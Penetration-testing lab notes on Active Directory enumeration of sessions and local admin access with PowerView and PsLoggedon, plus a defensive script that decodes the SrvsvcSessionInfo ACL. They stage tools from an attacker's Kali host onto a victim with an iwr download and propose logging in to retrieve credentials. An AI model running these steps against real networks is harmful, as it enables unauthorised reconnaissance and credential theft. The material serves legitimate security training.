Enumerate permissions and logged-on users

Short notes:

  • Why was the PowerView Get-NetSession command giving us an "Access denied" error?

    The error occurred because the NetSessionEnum API requires specific permissions to enumerate sessions, and the user did not have sufficient privileges to access this information remotely on the targeted machines.

  • How did we check for the required permissions?

    We checked the permissions using the PowerShell Get-Acl cmdlet, which retrieved and displayed the access permissions for the relevant registry key:

    Get-Acl -Path HKLM:SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity\ | fl

  • Which registry key is responsible for controlling the permissions?

    The responsible key is the SrvsvcSessionInfo registry key, located under: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity.
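    Added example, not part of the original notes: the SrvsvcSessionInfo value is a binary security descriptor, so Get-Acl on the key only shows who can read the key, not who is allowed to enumerate sessions. This script decodes the value itself and lists each ACE, which is how a defender checks whether broad groups are granted session enumeration on a host. It assumes it runs locally with rights to read HKLM; the function name is my own.

```powershell
# Added example (not from the original notes): decode the SrvsvcSessionInfo
# security descriptor and list the principals it grants or denies.
# Assumes local execution with read access to HKLM; function name is hypothetical.
$keyPath   = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\DefaultSecurity'
$valueName = 'SrvsvcSessionInfo'

function Get-SrvsvcSessionInfoAces {
    param(
        [string]$Path = $keyPath,
        [string]$Name = $valueName
    )
    # REG_BINARY comes back as byte[]; it holds a self-relative security descriptor.
    $bytes = (Get-ItemProperty -Path $Path -Name $Name -ErrorAction Stop).$Name
    if (-not $bytes) { throw "Value '$Name' not found under '$Path'" }

    $sd = New-Object System.Security.AccessControl.RawSecurityDescriptor($bytes, 0)

    foreach ($ace in $sd.DiscretionaryAcl) {
        # Only ACEs with a SID and mask (allow/deny entries) are meaningful here.
        if ($ace -isnot [System.Security.AccessControl.KnownAce]) { continue }
        $sid = $ace.SecurityIdentifier
        try {
            $principal = $sid.Translate([System.Security.Principal.NTAccount]).Value
        } catch {
            # Unresolvable SID (deleted account, foreign domain): keep the raw SID.
            $principal = $sid.Value
        }
        [pscustomobject]@{
            Principal  = $principal
            Sid        = $sid.Value
            AceType    = $ace.AceType
            AccessMask = ('0x{0:X8}' -f $ace.AccessMask)
        }
    }
}

Get-SrvsvcSessionInfoAces | Format-Table -AutoSize
```

    Every principal with an allow entry in this list can call NetSessionEnum against the host; review whether wide groups belong there.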

# This is a custom-made folder; the tools in it were downloaded from the official Microsoft page.
locate -i psloggedon
python3 -m http.server 80 -d /usr/share/pstools/
iwr -uri http://$KaliIP/<fileName> -Outfile <fileName>
# PowerView command used to scan the domain to identify computers where the current user has local administrative privileges.
Find-LocalAdminAccess
# Identifying logged-in users on a machine using the NetWkstaUserEnum and NetSessionEnum APIs.
# Example usage:
Get-NetSession -ComputerName files04 -Verbose
Get-NetSession -ComputerName web04 -Verbose
Get-NetSession -ComputerName client74 -Verbose

# Note: If you encounter an "Access Denied" error, this likely indicates insufficient privileges to run the query. 
# The specific error message may provide additional context regarding the required permissions.

# It may be more effective to use other tools than Get-NetSession.
# For instance, try using psloggedon.exe for enumeration.
# Download and add it as needed.
.\PsLoggedon.exe \\files04
.\PsLoggedon.exe \\client74
.\PsLoggedon.exe \\web04

# Important: If PsLoggedon does not display any logged-in users, this might indicate that the Remote Registry service is not running, 
# which is a requirement for PsLoggedon to function properly.

# If we identify any user with login capability, we can attempt to log into the machine and retrieve credentials. RDP may also be an option.

Note: PsLoggedon.exe must first be uploaded to the victim machine (see the iwr command above) before the PsLoggedon commands above can be run.
